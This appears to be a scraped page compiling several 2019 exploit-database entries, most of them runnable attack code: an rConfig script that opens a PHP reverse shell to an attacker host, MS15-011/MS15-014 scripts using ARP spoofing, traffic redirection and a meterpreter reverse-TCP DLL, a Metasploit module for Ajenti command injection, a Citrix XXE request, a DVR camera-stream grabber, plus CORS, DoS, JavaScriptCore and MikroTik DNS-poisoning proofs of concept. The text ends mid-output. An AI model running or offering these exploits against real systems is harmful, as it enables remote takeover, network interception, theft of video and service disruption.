ISHACK AI BOT

# Exploit Title: rConfig 3.9.2 - Remote Code Execution # Date: 2019-09-18 # Exploit Author: Askar # Vendor Homepage: https://rconfig.com/ # Software link: https://rconfig.com/download # Version: v3.9.2 # Tested on: CentOS 7.7 / PHP 7.2.22 # CVE : CVE-2019-16662 #!/usr/bin/python import requests import sys from urllib import quote from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 4: print "[+] Usage : ./exploit.py target ip port" exit() target = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port)) install_path = target + "/install" req = requests.get(install_path, verify=False) if req.status_code == 404: print "[-] Installation directory not found!" print "[-] Exploitation failed !" exit() elif req.status_code == 200: print "[+] Installation directory found!" url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload print "[+] Triggering the payload" print "[+] Check your listener !" requests.get(url_to_send, verify=False) rConfig-preauth.png

# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path # Discovery Date: 2019-10-28 # Exploit Author: Alberto Vargas # Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/ # Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users) # Version: 10.2 R1 # Tested on: Windows 10 Pro x64 Esp # Version: 10.0.18362 # Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/> # Schedule a Free Demo A leading developer of security surveillance and control systems for # networked digital video and audio recording, video image pattern processing and digital data transmission. # www.issivs.com # Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for # managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply # intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments, # SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set # of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise # supports all the features of the other 3 editions. # Description: The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an # authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require # the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges # of the application. # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ SecurOS Control Service SecurosCtrlService C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe Auto # Service info: C:\Users\user>sc qc SecurosCtrlService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: SecurosCtrlService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : SecurOS Control Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution # Date: 2019-10-28 # Exploit Author: Thomas Zuk # Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, # Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 # Tested on: Windows 7 , Windows Server 2012 # CVE : CVE-2015-0008 # Type: Remote # Platform: Windows # Description: While there exists multiple advisories for the vulnerability and video demos of # successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code # targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level # remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys). #!/usr/bin/python3 import argparse import os import subprocess import socket import fcntl import struct # MS15-011 Exploit. # For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011 # Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1 # Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1 # Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy. def arpSpoof(interface, hostIP, targetIP): arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP) arpArgs = arpCmd.split() print("Arpspoofing: %s" % (arpArgs)) p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) def karmaSMB(hostIP): print("reverting GptTmpl.inf from bak") os.system("cp GptTmpl.inf.bak GptTmpl.inf") appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP) CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP) f = open("GptTmpl.inf","a", encoding='utf-16le') f.write(appInit) f.write(CURunKey) f.close() path = os.getcwd() fConfig = open("smb.conf","w") fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n") fConfig.close() karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ " os.system(karmaCmd) def iptables_config(targetIP, hostIP): print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward') print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP)) print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP)) print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE') os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP)) os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP)) os.system('iptables -t nat -A POSTROUTING -j MASQUERADE') def get_interface_address(ifname): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24]) def generatePayload(lhost, lport): print("generating payload(s) and metasploit resource file") msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport) os.system(msfDll) msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport) print("metasploit resource script: %s" % msfResource) print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically") file = open("meta_resource.rc", "w+") file.write(msfResource) file.close() if __name__ == '__main__': parser = argparse.ArgumentParser() # Add arguments parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True) parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True) parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True) parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False) parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False) args = parser.parse_args() # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files. print ("checking for missing file(s)") if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"): print("Requirements missing. Downloading required files from github") os.system("git clone https://github.com/Freakazoidile/MS15-011-Files") os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/") # Get the provided interfaces IP address ipAddr = get_interface_address(args.interface) if args.lhost is not None: lhost = args.lhost else: lhost = ipAddr if args.lport is not None: lport = args.lport else: lport = '4444' dcSpoof = "" dcCommaList = "" count = 0 # loop over the domain controllers, poison each and target the host IP # create a comma separated list of DC's # create a "-t" separate list of DC's for use with arpspoof for dc in args.domain_controller: dcSpoof += "-t %s " % (dc) if count > 0: dcCommaList += ",%s" % (dc) else: dcCommaList += "%s" % (dc) arpSpoof(args.interface, dc, "-t %s" % (args.target_ip)) count += 1 # arpspoof the target and all of the DC's arpSpoof(args.interface, args.target_ip, dcSpoof) # generate payloads generatePayload(lhost, lport) # Setup iptables forwarding rules iptables_config(args.target_ip, ipAddr) #run Karmba SMB Server karmaSMB(ipAddr) print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers)) print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")

# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing # Date: 2019-10-28 # Exploit Author: Milad Khoshdel # Software Link: https://wordpress.org/download/ # Version: Wordpress 5.2.4 # Tested on: Linux Apache/2 PHP/7.2 # Vulnerable Page: https://[Your-Domain]/wp-json # POC: # The web application fails to properly validate the Origin header (check Details section for more information) # and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue # requests made with user credentials and read the responses to these requests. Trusting arbitrary # origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. # REGUEST --> GET /wp-json/ HTTP/1.1 Origin: https://www.evil.com Accept: */* Accept-Encoding: gzip,deflate Host: [Your-Domain] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Connection: Keep-alive # RESPONSE --> HTTP/1.1 200 OK Date: Mon, 28 Oct 2019 07:34:39 GMT Server: NopeJS X-Robots-Tag: noindex Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages Access-Control-Allow-Headers: Authorization, Content-Type Allow: GET Access-Control-Allow-Origin: https://www.evil.com Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE Access-Control-Allow-Credentials: true Vary: Origin,Accept-Encoding,User-Agent Keep-Alive: timeout=2, max=73 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8 Original-Content-Encoding: gzip Content-Length: 158412

# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass # Date: 2019-10-28 # Exploit Author: Thomas Zuk # Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, # Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1 # Tested on: Windows 7 , Windows Server 2012 # CVE : CVE-2015-0009 # Type: Remote # Platform: Windows # Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes # the target system to revert various security settings to their default settings. This includes SMB server # and network client settings, which by default do not require SMB signing except for domain controllers. # Successful exploitation against a system with a hardened configuration that requires SMB Signing by the # network client will make the target system vulnerable to MS15-011, which can lead to remote code execution. #!/usr/bin/python3 import argparse import fcntl import os import socket import struct import subprocess from subprocess import PIPE import re # MS15-014 Exploit. # For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014 # Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1 # Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1 # Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy. def arpSpoof(interface, hostIP, targetIP): arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP) arpArgs = arpCmd.split() print("Arpspoofing: %s" % (arpArgs)) p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) def corrupt_packet(): global count # NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445. netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 & netsedArgs = netsedCmd.split() print("Starting NetSed!") print("NetSed: %s" % (netsedArgs)) netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT) while True: o = (netsedP.stdout.readline()).decode('utf-8') if o != '': if args['verbose']: print("NetSed output: %s" % o) if re.search('Applying rule', o) is not None: count += 1 print('packet corrupted: % s' % count) # During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts. # The script waits for up to 7 for reliability. Tested on Windows 7 SP1 and Server 2012 R2 if count == 4: print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.") #During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful. if count == 7: break def get_interface_address(ifname): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24]) def iptables_config(targetIP, hostIP): #allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed. print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward') print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446') print('[+] Make sure to cleanup iptables after exploit completes') os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446') if __name__ == '__main__': parser = argparse.ArgumentParser(description='Find the SecEdit\GptTmpl.inf UUID to exploit MS15-014') parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True) parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True) parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True) parser.add_argument("-v", "--verbose", help="Toggle verbose mode. displays all output of NetSed, very busy terminal if enabled.", action='store_true') args = vars(parser.parse_args()) target_ip = args['target_ip'] count = 0 # Get the provided interfaces IP address ipAddr = get_interface_address(args['interface']) dcSpoof = "" dcCommaList = "" dcCount = 0 # loop over the domain controllers, poison each and target the host IP # create a comma separated list of DC's # create a "-t" separate list of DC's for use with arpspoof for dc in args['domain_controller']: dcSpoof += "-t %s " % (dc) if dcCount > 0: dcCommaList += ",%s" % (dc) else: dcCommaList += "%s" % (dc) arpSpoof(args['interface'], dc, "-t %s" % (target_ip)) dcCount += 1 # arpspoof the target and all of the DC's arpSpoof(args['interface'], target_ip, dcSpoof) # Setup iptables forwarding rules iptables_config(target_ip, ipAddr) #identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed. corrupt_packet()

# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit) # Date: 2019-10-29 # Exploit Author: Onur ER # Vendor Homepage: http://ajenti.org/ # Software Link: https://github.com/ajenti/ajenti # Version: 2.1.31 # Tested on: Ubuntu 19.10 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => "Ajenti 2.1.31 Remote Code Execution", 'Description' => %q{ This module exploits a command injection in Ajenti <= 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned. }, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'Onur ER <[email protected]>' # Metasploit module ], 'References' => [ ['EDB', '47497'] ], 'DisclosureDate' => '2019-10-14', 'License' => MSF_LICENSE, 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Privileged' => false, 'Targets' => [ [ 'Ajenti <= 2.1.31', {} ] ], 'DefaultOptions' => { 'RPORT' => 8000, 'SSL' => 'True', 'payload' => 'python/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0 )) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']) ]) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => "/view/login/normal" }) if res and res.code == 200 if res.body =~ /'ajentiVersion', '2.1.31'/ return Exploit::CheckCode::Vulnerable elsif res.body =~ /Ajenti/ return Exploit::CheckCode::Detected end end vprint_error("Unable to determine due to a HTTP connection timeout") return Exploit::CheckCode::Unknown end def exploit print_status("Exploiting...") random_password = rand_text_alpha_lower(7) json_body = { 'username' => "`python -c \"#{payload.encoded}\"`", 'password' => random_password, 'mode' => 'normal' } res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'), 'ctype' => 'application/json', 'data' => JSON.generate(json_body) }) end end

# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection # Date: 2019-08-28 # Exploit Author: Vahagn Vardanya # Vendor Homepage:https://www.citrix.com/downloads/storefront/ # Software Link: https://support.citrix.com/article/CTX251988 # Version: # Citrix StoreFront Server earlier than 1903 # Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000) # Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)# # Tested on: Windows # Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb # PoC POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1 Content-Type: application/vnd.citrix.requesttoken+xml Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd. citrix.authenticateresponse-1+xml Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 X-Forwarded-For: 192.168.204.1 X-Citrix-Agent: crm. X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image X-Citrix-IsUsingHTTPS: No Host: 192.168.204.131 Content-Length: 331 Expect: 100-continue <?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken "><for-service>a</for-service><for-service-url>http://secure-web.cisco.com/ <http://secure-web.cisco.com/1ijL9Cycthe9FsmytQkHCl1Xg9pMufEcuz0PmzFHVwkbFjSep42bW3GRBkLUxePJTdOcYeHl5hlVi95aQc-F0KUuqpBKFdx4EXJ_ppx3MY000cALA2hGugGjMX3hbmvhtPOTba7B4LnAcpuyFDLHiSlv8xyu_CzN0mhekRY51L34p4Wy9oMguR9Bj8YWAm6KxixMl1DiaZ88h4FVR0vKzHdtedNF63xO329dQAtQuVWiipK_rt4rnVWKmorTTrbp-bsdV7zUBsqjON-MZYpzagQ/http%3A%2F%2F192.168.204.146%2FCitrix%2Fstore_nameAuth%2Fauth%2Fv1%2Ftoken></for-service-url><reqtokentemplate /><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>

# Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure # Date: 2019-10-29 # Author: LiquidWorm # Vendor:iSeeQ # Link: http://www.iseeq.co.kr # CVE: N/A #!/bin/bash # # # iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure # # # Vendor: iSeeQ # Product web page: http://www.iseeq.co.kr # Affected version: WH-H4 1.03R / 2.0.0.P # # Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality # pictures which adopts high performance video processing chips and embedded # Linux system. This advanced video digital platform is very useful to identify # an object from a long distance. # # Desc: The DVR suffers from an unauthenticated and unauthorized live stream # disclosure when get_jpeg script is called. # # Tested on: Boa/0.94.13 # PHP/7.0.22 # DVR Web Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5539 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php # # # 28.10.2019 # if [ "$#" -ne 2 ]; then echo "Usage: $0 IP:PORT CHANNEL" exit fi IP=$1 CHANNEL=$2 HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL" STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F" " '{print $2}') if [ "$STATUS" == "404" ]; then echo "Target not vulnerable!" exit fi echo "Collecting snapshots..." for x in {1..10}; do echo -ne $x curl "$HOST" -o seq-$x.jpg -#; sleep 0.8 done echo -ne "\nDone." echo -ne "\nRendering video..." ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4 echo " done." echo -ne "\nRunning animation..." sleep 1 cvlc clip.mp4 --verbose -1 -f vlc://quit

# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service # Date: 2019-10-30 # Vendor Homepage:https://www.alloksoft.com/ # Software Link: https://www.alloksoft.com/wmv.htm # Exploit Author: Nithoshitha S # Tested Version: v4.6.1217 # Tested on: Windows 7 x64 # Windows XP SP3 # 1.- Run python code :poc.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey' # 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code' # 5.- Click 'OK' and you will see a crash. # poc.py #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc): let notAGetterSetter = {whatever: 42}; function v2(v5) { const v10 = Object(); if (v5) { const v12 = {set:Array}; const v14 = Object.defineProperty(v10,"length",v12); const v15 = (140899729)[140899729]; } else { v10.length = notAGetterSetter; } const v18 = new Uint8ClampedArray(49415); v18[1] = v10; const v19 = v10.length; let v20 = 0; while (v20 < 100000) { v20++; } } const v26 = v2(); for (let v32 = 0; v32 < 1000; v32++) { const v33 = v2(true); } /* Crashes with: ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer<To>::type::info()) ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *] 1 0x1111ada79 WTFCrash 2 0x1111ada99 WTFCrashWithSecurityImplication 3 0x10ffb8f55 JSC::GetterSetter* JSC::jsCast<JSC::GetterSetter*>(JSC::JSValue) 4 0x10ffaf820 JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::executeEffects(unsigned int, JSC::DFG::Node*) 5 0x10ff9f37b JSC::DFG::AbstractInterpreter<JSC::DFG::InPlaceAbstractState>::execute(unsigned int) 6 0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*) 7 0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA() 8 0x10ff9d647 JSC::DFG::CFAPhase::run() 9 0x10ff9cc61 bool JSC::DFG::runAndLog<JSC::DFG::CFAPhase>(JSC::DFG::CFAPhase&) 10 0x10ff6c65b bool JSC::DFG::runPhase<JSC::DFG::CFAPhase>(JSC::DFG::Graph&) 11 0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&) 12 0x110279031 JSC::DFG::Plan::compileInThreadImpl() 13 0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*) 14 0x11052a9bb JSC::DFG::Worklist::ThreadBody::work() 15 0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const 16 0x1111b38a9 WTF::Detail::CallableWrapper<WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0, void>::call() 17 0x1102c433a WTF::Function<void ()>::operator()() const 18 0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) 19 0x111285525 WTF::wtfThreadEntryPoint(void*) 20 0x7fff5a7262eb _pthread_body 21 0x7fff5a729249 _pthread_start 22 0x7fff5a72540d thread_start */ The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows. Below is my preliminary analysis of the cause of the bug. The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it: # Block 0 (before if-else): 44: NewObject(...) <jump to block 1 or 2 depending on v5> # Block 1 (the if part): ... <install .length property on @44> // Code for const v15 = (140899729)[140899729]; ForceOSRExit Unreachable # Block 2 (the else part) PutByOffset @44, notAGetterSetter PutStructure # Block 3 (after the if-else): ... // Code for v10.length. Due to feedback from previous executions, DFG // JIT speculates that the if branch will be taken and that it will see // v10 with a GetterSetter for .length here CheckStructure @44, structureWithLengthBeingAGetterSetter 166: GetGetterSetterByOffset @44, .length // Load the GetterSetter object from @44 167: GetGetter @166 // Load the getter function from the GetterSetter ... Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout. Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]): * It determines that the GetGetterSetterByOffset node loads the named property from the object @44 * It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2) * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1 * As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2). At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that. [1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43 [2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49 [3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51 [4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811

# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning # Date: 2019-10-30 # Exploit Author: Jacob Baines # Vendor Homepage: https://mikrotik.com/ # Software Link: https://mikrotik.com/download # Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below) # Tested on: Various x86 and MIPSBE RouterOS installs # CVE : CVE-2019-3978 # Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21 # Disclosure: https://www.tenable.com/security/research/tra-2019-46 # Unauthenticated DNS request via Winbox # RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests # to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up # a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978. # This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8). # The PoC will always send a DNS request for example.com. In the following write up, # I detail how to use this to poison the routers cache: # https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21 # Note that the writup focuses on router's configured *without* the DNS server enabled. # Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server. ## What are the build dependencies? # This requires: # * Boost 1.66 or higher # * cmake ## How do I build this jawn? # Just normal cmake. Try this: # ```sh # mkdir build # cd build # cmake .. # make # ``` # Resolve dependencies as needed. ## Usage Example # ```sh # albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8 # -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]} # <- 